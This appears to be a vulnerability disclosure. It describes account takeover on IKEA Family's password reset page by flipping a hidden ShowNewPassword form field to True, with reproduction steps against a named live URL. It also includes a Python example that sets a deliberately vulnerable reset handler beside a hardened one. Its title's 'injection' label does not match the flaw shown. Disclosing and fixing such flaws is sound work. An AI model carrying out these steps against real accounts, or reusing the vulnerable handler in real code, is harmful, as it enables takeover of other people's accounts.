Hoki Injection CVE-2020-69


Summary:

An attacker can take over all accounts on IKEA Family through the password reset flow.
Steps To Reproduce:

https://family.ikea.eg/en-us/login/forgotpassword

  • First, enter your email.
  • Open the browser's inspect element and search for this hidden field:

<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="False">

  • Edit value="False" to value="True" so that it reads:

<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="True">

  • Click next.
  • Enter your new password.
  • Confirm, and the account is taken over.
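Added example (not IKEA's code and not from the original report): a minimal Python model of a two-step password reset, showing the vulnerable handler that lets the client-supplied hidden field ShowNewPassword decide whether the new-password step runs, beside a hardened handler that keeps that decision in server-side session state which only a successful check of the emailed token can set. The names USERS, RESET_TOKENS, SESSIONS, request_reset, vulnerable_reset and hardened_reset are assumptions made for this example.

```python
import hashlib
import hmac
import secrets

# Constructed sample data: one user, server-side token store, server-side sessions.
USERS = {"alice@example.com": {"password_hash": b"old"}}
RESET_TOKENS = {}   # email -> single-use token that was sent by email
SESSIONS = {}       # session id -> server-side state for that browser session


def hash_pw(password):
    # Salted PBKDF2; a real deployment would use its framework's password hasher.
    salt = secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def request_reset(email):
    # Generates the token the server emails to the user (never sent to the browser).
    token = secrets.token_urlsafe(16)
    RESET_TOKENS[email] = token
    return token


def vulnerable_reset(form):
    # Vulnerable: a hidden form field, fully under the client's control, decides
    # whether the "set new password" step is allowed, so the token check is skippable.
    email = form.get("Email")
    if email not in USERS:
        return "unknown user"
    if form.get("ShowNewPassword") == "True":
        USERS[email]["password_hash"] = hash_pw(form["NewPassword"])
        return "password changed"
    return "token emailed"


def hardened_reset(form, session_id):
    # Hardened: ShowNewPassword is ignored; the server's own session state gates step 2.
    state = SESSIONS.setdefault(session_id, {})
    email = form.get("Email")
    if email not in USERS:
        return "unknown user"
    if "Token" in form:  # step 1: prove possession of the emailed token
        expected = RESET_TOKENS.get(email)
        if expected and hmac.compare_digest(expected, form["Token"]):
            RESET_TOKENS.pop(email)            # single use
            state["verified_email"] = email    # only the server can set this
            return "enter new password"
        return "token check failed"
    if state.get("verified_email") != email:   # step 2: server-side gate
        return "not verified"
    USERS[email]["password_hash"] = hash_pw(form["NewPassword"])
    state.pop("verified_email")
    return "password changed"
```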
